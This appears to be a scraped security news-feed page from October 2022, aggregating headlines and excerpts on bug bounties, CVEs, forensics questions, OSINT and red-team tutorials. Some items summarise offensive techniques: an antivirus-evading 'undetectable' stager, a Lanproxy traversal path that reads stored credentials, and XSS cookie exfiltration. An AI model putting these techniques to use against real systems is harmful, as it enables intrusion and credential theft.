    How to Boost Your Cybersecurity by Uncovering Relevant, Timely, and Actionable Insights Continue reading on Medium »
    Challenge Ondes de choc
    Find a photo published on the page https://www.facebook[.]com/pejykristianina on 30 September 2022. Continue reading on Medium »
  • Open

    How long do deleted text messages stay in mmssms.db?
    If I deleted some text message today, how long will it stay in the database? Thanks. submitted by /u/prois99
  • Open

    Accessing/Editing Folders of Other Users in the Organisation.
    Lark Technologies disclosed a bug submitted by snapsec: https://hackerone.com/reports/1025881 - Bounty: $1000

  • Open

    Privilege Escalation to All-staff group
    Lark Technologies disclosed a bug submitted by snapsec: https://hackerone.com/reports/1021460 - Bounty: $500
    HTML INJECTION FOUND ON https://adobedocs.github.io/analytics-1.4-apis/swagger-docs.html DUE TO OUTDATED SWAGGER UI
    Adobe disclosed a bug submitted by dreamer_eh: https://hackerone.com/reports/1736466
  • Open

    Exposed Mongo Express Without Authentication
    There is a specific keyword which we can use to get open Mongo Express interfaces in Censys. The interface is as follows: Continue reading on Medium »
    How i was able to get free money via sending negative tokens
    How i was able to get free money via sending negative tokens Continue reading on Medium »
    Practical Dynamic Analysis Of Mobile Applications
    Hands-on Practical Dynamic Analysis Of Mobile Applications Continue reading on Medium »
    Bug Bounty Reports
    Summary of almost all paid bounty reports on H1 Continue reading on Medium »
    My Methodology for Making a Book library with Notion for Bug Bounty and Pentesting
    How to Use Notion 100% in Your Bug Bounty and Pentesting Self-Study. Continue reading on Medium »
    Bug Zero at a Glance [Week 22–28 October]
    What happened with Bug Zero? Continue reading on Bug Zero »
    The Top 6 Bug Bounty Hunters
    TL;DR- There are only a handful of hunters who have passed $1,000,000 in total bounty payouts, the first of them barely out of high school… Continue reading on The Gray Area »
    RCE docker api, but …
    This is a short write up and to be honest “lazy” to write this. Continue reading on Medium »
    Blind SSRF in Skype (Microsoft)
    Server Side Request Forgery is a vulnerability that allows attacker to make server request to attacker controlled network location/path. Continue reading on InfoSec Write-ups »
  • Open

    Extract RAM Data from process using Volatility
    Hi, I need to extract all data from this .exe file from a RAM dump (Windows) found using psscan. When I run windows.dumpfiles with this process ID I cannot get any information. Am I at a dead end, or is there some other command that I can use to get RAM memory from this file? I would ideally like strings of all computations etc.
    PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
    19176 6884 CryptoProgA.ex 0x808a00e130c0 1 - 1 True 2022-10-28 21:45:42.000000 N/A Disabled
    submitted by /u/Forensics808
    WhatsApp and WeChat
    Anyone have any success collecting chats from WhatsApp and WeChat on an iOS device using the Cellebrite? Any recommendations for a successful collection? submitted by /u/hw60068n
    MMKV Visualizer - simple visualizer for mobile forensicators
    A simple visualizer utilizing Pyodide & Svelte to parse MMKV databases, a framework by Tencent/WeChat -- https://www.mmkv-visualizer.com/ submitted by /u/pakmanzzz
  • Open

    RC4 Is Still Considered Harmful
    submitted by /u/sanitybit
    Passkeys as a tool for user retention
    submitted by /u/Khryse
    Dastardly - a free, lightweight web application security scanner for your CI/CD pipeline
    submitted by /u/Khryse
    CVE-2022-22241: Juniper SSLVPN / JunOS RCE and Multiple Vulnerabilities – Blog
    submitted by /u/spacedust65
    Spartacus DLL Hijacking Discovery Tool - "all in one"
    submitted by /u/h0wlett
    TCP/IP Vulnerability CVE-2022–34718 PoC Restoration and Analysis
    submitted by /u/sanitybit
    Hardware Trojans Under a Microscope
    submitted by /u/Ryancor
  • Open

    Multi-user password manager
    I'm looking for some recommendations concerning a password manager that would: be multi-user; have different user roles and levels; have audit logging; be on-prem, offline, self-hosted; possibly be open-source or reasonably priced. If you happen to have experience with a PM like this, I'd appreciate a recommendation, thanks! submitted by /u/FreakySeahorse
    How to forward syslog events related to commands run by non-root users
    Hi, although I have set up my /etc/rsyslog.d/50-default.conf to forward all event logs (```*.*```), I only see commands run by the root user. Is there something I missed?
    ```
    (base) ibrasec@ibrasec-HP-ProBook-640-G5:/etc/rsyslog.d$ cat 50-default.conf
    # Default rules for rsyslog.
    #
    # For more information see rsyslog.conf(5) and /etc/rsyslog.conf
    #
    # First some standard log files. Log by facility.
    #
    *.* @192.168.106.214
    auth,authpriv.* @192.168.106.214 /var/log/auth.log
    *.*;auth,authpriv.none @192.168.106.214 -/var/log/syslog
    #cron.* /var/log/cron.log
    #daemon.* -/var/log/daemon.log
    kern.* @192.168.106.214 -/var/log/kern.log
    #lpr.* -/var/log/lpr.log
    mail.* @192.168.106.214 -/var/log/mail.log
    user.* @192.168.106.214 -/var/log/user.log
    #
    # Logging for the mail system. Split it up so that
    # it is easy to write scripts to parse these files.
    #
    #mail.info -/var/log/mail.info
    #mail.warn -/var/log/mail.warn
    mail.err /var/log/mail.err
    #
    # Some "catch-all" log files.
    #
    #*.=debug;\
    # auth,authpriv.none;\
    # news.none;mail.none -/var/log/debug
    #*.=info;*.=notice;*.=warn;\
    # auth,authpriv.none;\
    # cron,daemon.none;\
    # mail,news.none -/var/log/messages
    #
    # Emergencies are sent to everybody logged in.
    #
    *.emerg :omusrmsg:*
    #
    # I like to have messages displayed on the console, but only on a virtual
    # console I usually leave idle.
    #
    #daemon,mail.*;\
    # news.=crit;news.=err;news.=notice;\
    # *.=debug;*.=info;\
    # *.=notice;*.=warn /dev/tty8
    ```
    submitted by /u/AlarmRevolutionary52
    STIX files
    Is anyone familiar with the STIX file format and how to visualize them on a Windows 10 box? submitted by /u/MrRaspman
    Starting an InfoSec career
    I’m currently 18 and in the running to start a degree in CompSci. My main areas of interest are pentesting, ethical hacking and cyber security analyst roles / red teaming. Here are my questions: What job positions are best to start with? What skills should I start working on right now? Apart from a degree, what certifications are best? If anyone has experience in ethical hacking, pentesting or cyber security in general I’d appreciate a PM as I’m trying to start networking. submitted by /u/wholesnacc15
  • Open

    Audio, but I do not know the language
    submitted by /u/Bratensauce75
    Retro heaven - lots of program files spanning back to 1995 (might use google translate from Polish though)
    submitted by /u/smsaczek
    shower pics
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    movies, tv, music and Japanese cartoons
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    photos of motor oil
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    SecWiki News 2022-10-28 Review
    DeFi Hacks Analysis - Root Cause by ourren. For more recent articles, visit SecWiki

    What is OSINT? What can be done with OSINT?
    OSINT (Open Source Intelligence), translated into Turkish as Açık Kaynak İstihbaratı, is a passive information-gathering tool. Passive information gathering… Continue reading on Medium »
    [Penetration Testing LAB] How to use OSINT with SpiderFoot for intelligence gathering
    With the rapid growth of information technology, large amounts of publicly available data are scattered across the internet; when this data is effectively organized, it can be called Open-Source Intelligence (OSINT). Continue reading on Medium »

    Defeating Guloader Anti-Analysis Technique
    Unit 42 is providing a script to deobfuscate a recently discovered Guloader variant that uses anti-analysis techniques, and other samples like it. The post Defeating Guloader Anti-Analysis Technique appeared first on Unit 42.

    ATT&CK Red Team Evaluation (Hongri Range 1)
    Study notes for the ATT&CK Red Team Evaluation (Hongri Range 1)
    Effective January 1, 2023: the Administrative Measures for the Registration of Network Product Security Vulnerability Collection Platforms are released
    The Measures consist of ten articles and set out systematic requirements for the registration, filing, information-change, and deregistration procedures of existing and proposed network security vulnerability collection platforms.
    The General Office of the State Council issues the National Guidelines for Building an Integrated National Government Big Data System
    The Guidelines set phased construction goals for the integrated national government big data system, helping to build a nationwide government big data system with unified standards, reasonable layout, coordinated management, security and reliability.
    Three Thomson Reuters databases were publicly accessible, containing at least 3TB of sensitive data
    According to a Cybernews report on October 27, the multinational media group Thomson Reuters had at least three databases left open, accessible to visitors without any authentication.
    CISCO device information disclosure vulnerability cases, part 2
    The previous article covered two vulnerability cases in Cisco router devices; this one adds vulnerability cases in Cisco IP phones and security appliances.
    Australian insurance giant suffers database dump, information of 3.9 million users fully exposed
    Australian health insurer Medibank disclosed on Wednesday that the personal information of all of its customers was exposed following a recent ransomware attack.
    FreeBuf Weekly | What delegates to the 20th Party Congress say about cybersecurity; supermarket giant Metro hit by cyberattack
    A summary of this week's hot news, security incidents, recommended reads and handy tools, so you don't miss any of the week's highlights!
    Unknown attackers deploy RomCom RAT against the Ukrainian military
    The attackers behind the RomCom remote access trojan have been found targeting Ukrainian military institutions.
    New APT group discovered! "South Asian Python" conducts espionage against India's Ministry of Defence
    Lieying Lab (猎影实验室) has discovered a new APT group that delivers novel Python-based info-stealing malware to India's Ministry of Defence for persistent espionage. We track it under the internal designation "APT-LY-1004".
    XiRang's path to metaverse security practice | CIS 2022 Cybersecurity Innovation Conference talk preview
    He will share the content moderation, anti-cheating and system-level defense solutions XiRang has adopted, from the perspective of the metaverse industry ecosystem and the changing security environment.
    Apple discloses serious vulnerability that could let apps eavesdrop on users' conversations with Siri
    Apple recently disclosed an iOS and macOS vulnerability named SiriSpy that allows apps with Bluetooth access to eavesdrop on users' conversations with Siri.
    FreeBuf Morning Report | Reuters leaks 3TB of customer data; Apple confirms it will use USB-C in EU countries
    Multinational media group Thomson Reuters left a 3TB database open, containing sensitive customer and corporate data, including third-party server passwords in plaintext.

    Blind SSRF in Skype (Microsoft)

    CVE-2021-3019 Lanproxy directory traversal vulnerability
    Author: 李安@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/XBsBNAzyciWwCRP3bMZnOw Vulnerability description: Lanproxy 0.1 has a path traversal vulnerability that allows directory traversal to read /../conf/config.properties and obtain the credentials for internal network connections. Lanproxy: lanproxy is an intranet tunneling tool that proxies personal computers and servers on a LAN out to the public internet...

    Critical OpenSSL vulnerability and fix to be released Nov first
    Article URL: https://www.docker.com/blog/security-advisory-critical-openssl-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33366483 Points: 2 # Comments: 0

    How to block all but a single IP from accessing a port?
    On occasion I will run Python's http.server script to share large project files with coworkers. However today another IP address gained access to the server during a download. The files are encrypted with 7z, but the files can still be accessed by anyone. Instead of coming up with a whole new method of file transferring I would just like to only allow a single IP to access it at a time. So far I've only been able to blacklist a single IP or all with Windows Firewall. I can't seem to figure out how to block all but a single one. Web searching has brought up nothing that works. The only thing I've found is to lock down all Internet traffic and allow a single IP through as an exception. This isn't an option since I want to still use my computer during the transfers. Edit: By default it looks like Windows Firewall will always set block rules above allow rules. This was disabling my allow exception. Override options could have been made by changing the settings with it. But instead I just blocked the range of IPs above and below the single one I wanted through. submitted by /u/TheThinSister [link] [comments]
    Looking for feedback on Halcyon's anti-ransomware product -- is it worth the hype?
    I'm doing some research on Halcyon's anti-ransomware agent ahead of a call and perhaps a demo of it. Anybody out there have real-world experience with it and have feedback to share? Or looked into the details of it and have doubts about their claims to prevent ransomware attacks? submitted by /u/EnterNam0 [link] [comments]
    Is BYOD good or not? Why would anyone but an organization want this policy?
    I'm in school for secure systems admin and engineering and our discussion board is having us read case studies about BYOD policies. I honestly do not see how anyone in the US (or anywhere else) would want or be okay with bringing their own devices for work use. I'm trying to not be biased, but I just don't understand why anyone would think this is a good idea. Everything I've found on Google is like "why byod isn't bad" or "how to secure byod with workspaces" but offers no substance. Like even the Amazon Workspace case studies don't actually read like a case study, it's an advertising blog that promotes it like it's a solution and not a list of future problems. 20% of data breaches had to deal with BYOD. What's to stop a really motivated coworker or stranger from gaining access to a device and spreading someone's private data? It creates so many ethical questions. So how do I find unbiased information on this? It seems like a security nightmare, makes centralized IT more challenging, I just don't understand why or how anyone could want this. Signing an acceptable use policy for devices I own and maintain myself, with my private data on it, seems like a horrible idea. Just why? Tldr: Are byod devices ethical, pragmatic, etc.? Info I've googled all seems biased because they're trying to sell the idea or a service. Anyone have links to unbiased case studies that aren't trying to market a policy or service? submitted by /u/fudginjerk [link] [comments]
    How can we stress-test our 3rd party L4 DDoS mitigation service?
    Hi, we are using a DDoS mitigation service from DataPacket for our game server hosting company. They provide L4 DDoS mitigation (L7 is in development.) Because we just recently started this company and just recently got set up with DataPacket, we haven't actually been hit with attacks, so we have no way of verifying how good it is. We also need this information for marketing purposes. I'm thinking of spinning up compute with one of the big 3 cloud providers and writing a script that uses hping3, but if there's a legal managed service that does this for us it's greatly appreciated. submitted by /u/soggynaan [link] [comments]
    Nmap Scan shows "sslstrip" as open port. Does this mean there was a compromise?
    Hello, we did an nmap scan over a company's network and I'm analysing it now. On one host (not maintained by me) it shows port 5800 open and says "http-proxy - sslstrip" as the version? Does this mean that we are already man-in-the-middled by an attacker? Or is this maybe a false positive? Are there any other reasons to use sslstrip? Thanks for your help. submitted by /u/kappadoky [link] [comments]

    Active Directory Lateral Movement and Post-Exploitation Cheat Sheet
    This is a detailed cheat sheet to help you with many high end certifications like CRTE, OSEP, and definitely OSCP and beyond. Continue reading on Medium »
    Red Team: Initial Access — Weaponization | Try Hack Me
    Hello world and welcome to HaXeZ, in this post I’m going to be going through the Weaponization room on TryHackMe. Until now, the rooms… Continue reading on Medium »
    Red Team: Initial Access — Red Team Reconnaissance | Try Hack Me
    Hello world and welcome to HaXeZ, in this post I’m going to be discussing the Red Team Reconnaissance room on TryHackMe. This room focuses… Continue reading on Medium »

    BigCommerce Launches a Public Bug Bounty Program
    Today, we are excited to launch our Public Bug Bounty Program that allows any security researcher to submit vulnerabilities to the… Continue reading on BigEng »
    A 250$ CSS Injection — My First Finding on Hackerone!
    This is my first post on medium, to tell the story of how I found a CSS injection and exploited it, so you can learn a new attack vector… Continue reading on Medium »
    My first ‘bug bounty’… Kind of.
    Lets set the scene. Continue reading on Medium »
    The Best Vulnerability Disclosure Programs (Less Competitive Bounties)
    TL;DR- There’s a ton of programs for bug bounties and vulnerability disclosure, but they’re usually filled with competition because… Continue reading on The Gray Area »
    How I Found P1 with Google Dork on Bugcrowd Program
    Tool Continue reading on System Weakness »
    How I bypass the OTP of a well known website.
    Hello Learners, I am Rajneesh K. Arya again here with my new blog on OTP bypassing. So let’s check what google said about it. Continue reading on Medium »
    How I Found P1 in Bugcrowd with only Recon
    Tool Continue reading on System Weakness »
    Tonic Dex partners with ImmunFi for a "bug bounty" program
    At Tonic Dex we take the security of user funds seriously. Continue reading on Medium »
    OAuth and the flaws in its implementation
    What is OAuth? Continue reading on InfoSec Write-ups »
    ANNOUNCEMENT: Paid Writing Opportunity for Infosec Writeups
    Hello dear writers Continue reading on InfoSec Write-ups »
    The Impact of a Vulnerability Found in a Misconfigured AWS S3 Bucket…
    Hello everyone, in this post I will talk about a vulnerability I found in a private company on the HackerOne platform and what we need to pay attention to here… Continue reading on Medium »

    OpenSSL warns of critical security vulnerability with upcoming patch
    Article URL: https://www.zdnet.com/article/openssl-warns-of-critical-security-vulnerability-with-upcoming-patch/ Comments URL: https://news.ycombinator.com/item?id=33364183 Points: 10 # Comments: 0
    High-severity vulnerability in GitHub was susceptible to Repo Jacking
    Article URL: https://www.scmagazine.com/analysis/cloud-security/high-severity-vulnerability-in-github-was-susceptible-to-repo-jacking Comments URL: https://news.ycombinator.com/item?id=33358243 Points: 1 # Comments: 0
    RepoJacking Vulnerability in GitHub
    Article URL: https://medium.com/checkmarx-security/attacking-the-software-supply-chain-with-a-simple-rename-1d9a9a126217 Comments URL: https://news.ycombinator.com/item?id=33354936 Points: 1 # Comments: 1

    Towards the next generation of XNU memory safety: kalloc_type
    submitted by /u/sanitybit [link] [comments]
    GitHub - karimhabush/cis-vsphere: A tool to assess the compliance of a VMware vSphere environment against the CIS Benchmark.
    submitted by /u/karimhabush [link] [comments]
    One-Time Programs
    submitted by /u/feross [link] [comments]
    control flow unflattening of an android rasp sdk
    submitted by /u/eybisi_ [link] [comments]
    Open source automated Tailscale security best practices benchmark assessment just released by Steampipe.io
    submitted by /u/stevecio [link] [comments]
    A vulnerability in the Galaxy Store allows attackers through an XSS to cause the store to install and/or launch an application, allowing remote attackers to trigger a remote command execution in the phone.
    submitted by /u/SSDisclosure [link] [comments]
    Visual Studio Code Jupyter Notebook RCE (CVE-2021-26437)
    submitted by /u/nibblesec [link] [comments]
    Hexacon conference videos
    submitted by /u/gquere [link] [comments]
    Divin'n'phishin with executable filetypes on Windows
    submitted by /u/ljulolsen [link] [comments]
    Building a multifunctional red team dropbox for USB and Ethernet attacks
    submitted by /u/RoganDawes [link] [comments]
    🪄 wb - A wizard that brings old files from Wayback Machine.
    submitted by /u/rjz4 [link] [comments]
    Ethernet ghosting & NAC bypass - A practical overview
    submitted by /u/Gallus [link] [comments]

    Openzeppelin Ethernaut Part — 0X00
    OAuth and the flaws in its implementation
    What is OAuth? Continue reading on InfoSec Write-ups »
    ANNOUNCEMENT: Paid Writing Opportunity for Infosec Writeups
    Cyber Security Control Validation Platform

    Jolokia Reflected XSS
    Mars disclosed a bug submitted by ramzanrl: https://hackerone.com/reports/1714563
    CVE-2022-42916: HSTS bypass via IDN
    curl disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1730660
    CVE-2022-35260: .netrc parser out-of-bounds access
    curl disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1721098
    Subdomain takeover on 'de-headless.staging.gymshark.com'
    Gymshark disclosed a bug submitted by a-p0c: https://hackerone.com/reports/1711890

    SecWiki News 2022-10-27 Review
    Those useless modules I built over the years: the attack sample replay module by ourren. For more recent articles, visit SecWiki

    Token handles abuse: One shell to HANDLE them all
    submitted by /u/gid0rah [link] [comments]
    Creating Fully Undetectable (FUD) Stager in C
    Hope you enjoyed the video and learned something new! https://youtu.be/Pu06zYUdpGs Still a lot of things to implement in order for this to be practical, but I think it was fun seeing 0/26 AV detection. Feel free to improve it yourself and do it responsibly; you are responsible for your own actions with that. submitted by /u/lsecqt [link] [comments]
    Lateral Movement via AutodialDLL registry key abuse
    submitted by /u/gid0rah [link] [comments]

    Free: Dastardly from Burp Suite
    Introducing Dastardly - a free, lightweight web application security scanner for your CI/CD pipeline, from the makers of Burp Suite. Secure web development ain't easy Ensuring your code is written sec
    Coming very soon: Dastardly, from Burp Suite
    New product alert! Dastardly is a free, lightweight web application security scanner for your CI/CD pipeline - and it's going to be landing in the next few days. It'll check your application for seven

    How should enterprises handle key-period security assurance (重保) during special periods | FreeBuf customer-side group topic discussion
    Key-period security assurance is both an important measure against risk and a "must-have" for enterprise growth in the digital economy. Against this backdrop, how should enterprises do it well?
    APT-Q-36: analysis of recent arsenal updates by the South Asian 摩诃草 (Patchwork) group
    摩诃草 is widely believed to have the backing of a South Asian state; its earliest attack activity dates back to November 2009, and it has remained active for more than ten years.
    At just 16, breaching 18 multinational giants including Microsoft: the LAPSUS$ hacking group is "wildly reckless"
    More young, reckless LAPSUS$-style hacking groups may be lurking in the shadows, waiting for their moment.
    Sneak peek! CIS 2022 Cybersecurity Innovation Conference talk topics announced early
    Breaking down spatial barriers to discuss cybersecurity together, bringing attendees and online viewers a different kind of cybersecurity feast.
    A vulnerability hidden in the SQLite database for 22 years
    Security expert Andreas Kellas detailed a high-severity vulnerability in the SQLite database, introduced in October 2000.
    Data breach lasted two and a half years! International ticketing giant See Tickets admits it
    Investigation shows the attack began in June 2019, and the malicious code was not fully removed from the website until January 2022.
    Seeing new threats clearly, building new defenses: innovation and operational practice in encrypted traffic detection | CIS 2022 Cybersecurity Innovation Conference talk preview
    The talk will describe how a one-stop encrypted threat operations system, combining encrypted network security, encrypted threat intelligence and encrypted situational awareness, helps customers across industries improve their ability to discover, analyze and defend against encrypted threats.

    How to Get the Most Out of Your Pentest
    TL;DR Define the goal of an assessment. Take time to choose the right assessment type. The more detail you give about an asset, the better quality your report will be. Select the right environment for the assessment. Consider the timing for performing the assessment. Communicate internally and make sure everyone is up to speed. Do... The post How to Get the Most Out of Your Pentest appeared first on TrustedSec.

    Extract certificates from running openvpn server process?
    First time in /r/computerforensics Hello! My VPN-Server (Ubuntu 18.04.3 running Webmin with openVPN (v2.4.4)-module) somehow got its server certificates deleted. The certificates must be somewhere in memory because users can still create new connections. But a restart of the service will (of course) change that. I've looked a little into the "dumpcerts" plugin of volatility but was dismayed to find that this doesn't really work on a unix machine. I'm also not 100% sure if openVPN doesn't somehow mangle the files when reading them in, which would make recovery impossible. The files in question were: /etc/openvpn/keys/[servername]/ca.crt /etc/openvpn/keys/[servername]/[servername].crt /etc/openvpn/keys/[servername]/[servername].key /etc/openvpn/keys/[servername]/dh4096.pem The whole directory got wiped (not sure how. Someone probably misclicked something. Need to make backups of this in the future). The Server is a VM and I have a snapshot from when it was working, so I can always test the connection and go back to a working state. Is there any chance to recover these files? If you could just point me in the direction of programs I could possibly use for this, that'd be great. I do not want to have to roll out over 400 new VPN-configurations to my users. Thanks in advance. submitted by /u/Snowman25_ [link] [comments]
    Xbox Series X forensics
    Any advice on tools that can help with Xbox Series X forensic analysis? The disk is encrypted, obviously. The user has set up a user password. Is cloning the disk and guessing the password manually the only way? submitted by /u/examiner_234234 [link] [comments]
    After Digital Forensics
    Since burn-out is high in the forensics field, I just wanted to check in with all the former digital forensics people. How are you? I spent 5 years in the field myself, and have zero plans on ever going back. The skills I learned (analysis, project management, deadline management, juggling multiple things) have all translated well into project work quite nicely. I'm not the smartest on my team, but I hold my own quite well amongst my peers, and we all work very well together. I do want to thank everyone that contributes to this field! If it's just answering a random question on a forum, or building a full blown forensics suite, you are helping far more than you know. It felt great to work amongst all of you, and the work you put in over the years. submitted by /u/MakingItElsewhere [link] [comments]

    Exposing One of the Hoax Producers
    A while ago a YouTube video went viral reporting that the bishops of Greater Jakarta (Jabodetabek) had declared their support for one of the… Continue reading on Medium »
    URL Shortener
    URL-shortening websites such as bitly.com or tinyurl.com are used to turn existing long URLs (uniform resource locators) into… Continue reading on Medium »
    How regular expressions can be useful in OSINT. Theory and some practice using Google Sheets
    This article consists of three short parts. Continue reading on Medium »

    Art Models 360 Photos
    http://artmodels360.com/rotate_images/ submitted by /u/c-rn [link] [comments]

    Active Directory Cheat Sheet
    This is a detailed AD cheat sheet with descriptions. Continue reading on Medium »
    Creating Fully Undetectable Payload (FUD) with C
    Welcome back my red teamers! Today’s blog is exciting because I personally did not expect such high result at evading AV vendors! Continue reading on Medium »
    GCPgoat Scenarios
    https://gcpgoat.joshuajebaraj.com/ Continue reading on Medium »

    Some Random ODs (Mostly Software)
    https://www.1pei.me/software/ https://bits.sigpipe.me https://birds-are-nice.me/software/ https://archive.wfv.me https://www.freedesktop.org/software/ submitted by /u/ilikemacsalot [link] [comments]

    Webauthn and passkeys
    Android and iOS are now using passkeys to store Webauthn credentials (private keys), which allows the synchronization of authentication keys across multiple devices. Apple and Google claim that the keys are end-to-end encrypted (here and here). "Passkeys in the Google Password Manager are always end-to-end encrypted: When a passkey is backed up, its private key is uploaded only in its encrypted form using an encryption key that is only accessible on the user's own devices." What's their proof that the keys are always encrypted? Is the software behind it open source? Do they follow some standard? Or should we just take their word? Thanks submitted by /u/nobo92 [link] [comments]
    What cross-platform browser has end-to-end encrypted bookmarks, open tabs, and history and has syncing functionality besides Firefox? I heard Edge doesn’t have encrypted sync data and neither does Chrome.
    What cross-platform browser has end-to-end encrypted bookmarks, open tabs, and history and has syncing functionality besides Firefox? I heard Edge doesn’t have encrypted sync data and neither does Chrome. submitted by /u/Bored-Giraffe [link] [comments]
    Netsec fundamentals to pair with CS?
    I'm completing the OSSU in the next few months with an emphasis on web development. Thus far my job hunting has not been fruitful due to my lack of a formal degree, but several interviewers have been nice enough to offer guidance on how I might improve my chances to launch a CS career. One that came up more often than not was going in on the IT side of the industry rather than straight in with development. If I understand correctly, netsec can lean toward the IT side but absolutely values the CS domain knowledge as well. That being the case, I wonder what IT and sec fundamentals to pursue in order to best complement my CS knowledge? I can see there is no shortage of vendor jargon and very domain-specific info for various specialized niches of sec, but I would assume there are core fundamentals that run the gamut. Is it as simple as studying networking? What kind of path would you suggest? Thanks in advance! [link] [comments]
    Real world examples on MITM attacks on Backend-to-backend flows (via Internet)
    Could you provide any real-world attack examples of TLS MITM done on backend-to-backend connections?
    [ server of org A ] ----> [server of org B]
    [ server of org A ] --(TLS MITM)--> [server of org B]
    (e.g. a backend server belonging to one organization connecting to a service provided by another organization) I have read about TLS MITM on customer-to-website flows using things like DNS poisoning via BGP hijack / DNS registrar account hack / etc. + getting a trusted cert (e.g. myetherwallet.com, Banrisul bank, etc.). But I was not able to find any info on successful TLS MITM on B2B connections. submitted by /u/skynetcoder [link] [comments]

    Chatterbox Hackthebox
    Devel From HackTheBox
    TryHackMe writeup: Skynet
    A fun TryHackMe room that has its twist and turns. Featuring a PHP Meterpreter, SMB enumeration, and PwnKit! Continue reading on InfoSec Write-ups »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 2) — StackZero

    Blind Insecure Direct Object Reference (IDOR) Leads To Export Other User’s Data On Instagram.
    Original post: https://nobugescapes.com/blog/blind-insecure-direct-object-reference-idor-leads-to-export-other-users-data/ Continue reading on Medium »
    SSRF Bug Leads To AWS Metadata Exposure
    How can you leverage an SSRF (“Server Side Request Forgery”) vulnerability to evade filters and leak internal AWS credentials on a web… Continue reading on Medium »
    Stored XSS To Cookie Exfiltration
    Today I will be explaining an XSS (“Cross Site Scripting”) vulnerability I found in a private bug bounty program that allowed me to… Continue reading on Medium »
    Report a Security Vulnerability Like a pro in less than 15 min!
    Bug bounty programs have become a major part of the security industry. They offer corporations, government agencies, and even individuals… Continue reading on Medium »
    Developer and negligence.
    Hello guys, long time I didn’t write something about my journey in Cyber Security. I’m quite busy with my college activities and attending… Continue reading on Medium »
    When security issues are considered as features (GITHUB)
    After 3 times in a row reporting issues that they do considerate as ‘abuse’ and not a vulnerability, I am publishing a PoC for their… Continue reading on Medium »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 2) — StackZero
    Let’s build Blind SQLi attack together, without tools but just with Python Continue reading on InfoSec Write-ups »

    Hijacking AUR Packages by Searching for Expired Domains
    submitted by /u/whisperingmime [link] [comments]
    Ring0VBA - Getting Ring0 Using a Goddamn Word Document
    submitted by /u/CyberMasterV [link] [comments]
    Token handles abuse: One shell to HANDLE them all
    submitted by /u/gid0rah [link] [comments]
    OpenSSL: CRITICAL vulnerability will be fixed in upcoming release
    submitted by /u/josephnoir [link] [comments]
    Lateral Movement via AutodialDLL registry key abuse
    submitted by /u/gid0rah [link] [comments]
    topmostp: A simple CLI tool to retrieve the N top most used ports
    submitted by /u/deleee [link] [comments]

    Give me your username. I’ll tell you who you are!
    OSINT tools for online social media research in Germany — an essay Continue reading on Medium »
    Publicly available information (PAI) is becoming increasingly important in the fields of…
    Continue reading on Medium »
    Cicada-3301 Vol:1 TryHackMe WriteUp (Steganography-Cryptography)
    Greetings everyone, in this post I will solve the Cicada-3301 Vol:1 room on the TryHackMe platform. This room covers cryptography and… Continue reading on Medium »

    SecWiki News 2022-10-26 Review
    DEAR: a deep-learning-based approach to automated program repair by ourren. Attack-defense exercise posture and defensive thinking by ourren. For more recent articles, visit SecWiki

    OpenSSL 3.0.7 update to fix Critical CVE out next Tuesday 1300-1700UTC
    Article URL: https://twitter.com/iamamoose/status/1584908434855628800 Comments URL: https://news.ycombinator.com/item?id=33343946 Points: 6 # Comments: 1
    I took a look at the most active GitHub users who publish the most CVE's
    Article URL: https://github.com/tg12/PoC_CVEs/blob/main/cve_links_by_github_username.txt Comments URL: https://news.ycombinator.com/item?id=33341794 Points: 2 # Comments: 0

    Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
    We examine trends in web threats for the second calendar year quarter of 2022, including how a malicious JavaScript downloader is evolving to evade detection. The post Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving appeared first on Unit 42.

    Meet PortSwigger's first women in tech scholars
    PortSwigger recently launched a scholarship scheme, specifically directed at creating opportunities for young women to kick-start their tech career. Our scholarships offer paid work opportunities, tai

    Practical thinking in attack-defense exercises: Part 1
    Using a provincial-level attack-defense exercise as an example, a discussion of my approach to breaking through.
    FreeBuf Morning Report | US Navy releases "Cyberspace Superiority Vision"; 96% of companies say sensitive cloud data has low security
    Ukraine's Computer Emergency Response Team (CERT-UA) has issued an alert about potential Cuba ransomware attacks on the country's critical networks.
    SMB attack threat simulation and defense
    Teacher 一把梭 is back again!
    Breaking the DevSecOps deadlock: deeply integrated security R&D operations let value flow efficiently
    开源网安 discusses the path to breaking the DevSecOps deadlock
    Stay alert! Someone on GitHub is using fake PoC exploits for phishing
    GitHub is one of the largest code hosting platforms, and researchers use it to publish PoC exploits to help the security community verify fixes or determine the impact and scope of a vulnerability.
    Attention: Apple has released a security update for this critical iOS 0-day vulnerability
    Apple has rolled out a new security update to fix a zero-day vulnerability in iOS and iPadOS.

    Weak randomness in WebCrypto keygen
    Node.js disclosed a bug submitted by bnoordhuis: https://hackerone.com/reports/1690000
    HTTP Request Smuggling Due to Incorrect Parsing of Header Fields
    Node.js disclosed a bug submitted by vvx7: https://hackerone.com/reports/1675191
    CVE-2022-32213 bypass via obs-fold mechanic
    Node.js disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1630336
    Node 18 reads openssl.cnf from /home/iojs/build/... upon startup on MacOS
    Node.js disclosed a bug submitted by mhdawson: https://hackerone.com/reports/1695596
    HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding (improper fix for CVE-2022-32215)
    Node.js disclosed a bug submitted by shacharm: https://hackerone.com/reports/1665156
    Business Logic, currency arbitrage - Possibility to pay less than the price in USD
    PortSwigger Web Security disclosed a bug submitted by xctzn: https://hackerone.com/reports/1677155

    TCP/IP vulnerability CVE-2022-34718: PoC reconstruction and vulnerability analysis
    Author: Numen Cyber Labs. Original link: https://mp.weixin.qq.com/s/5oBAw-oLtHA52-0eBcPSpg Background and preparation: Microsoft's patch last month included a TCP/IP protocol vulnerability that could allow code execution. To verify the vulnerability's scope of impact and possible consequences, Numen's senior security research team analyzed it in depth and reconstructed a PoC through patch diffing. This article describes in detail how we reconstructed the PoC through patch diffing, and...
    TOTOLINK NR1800X series CVE analysis
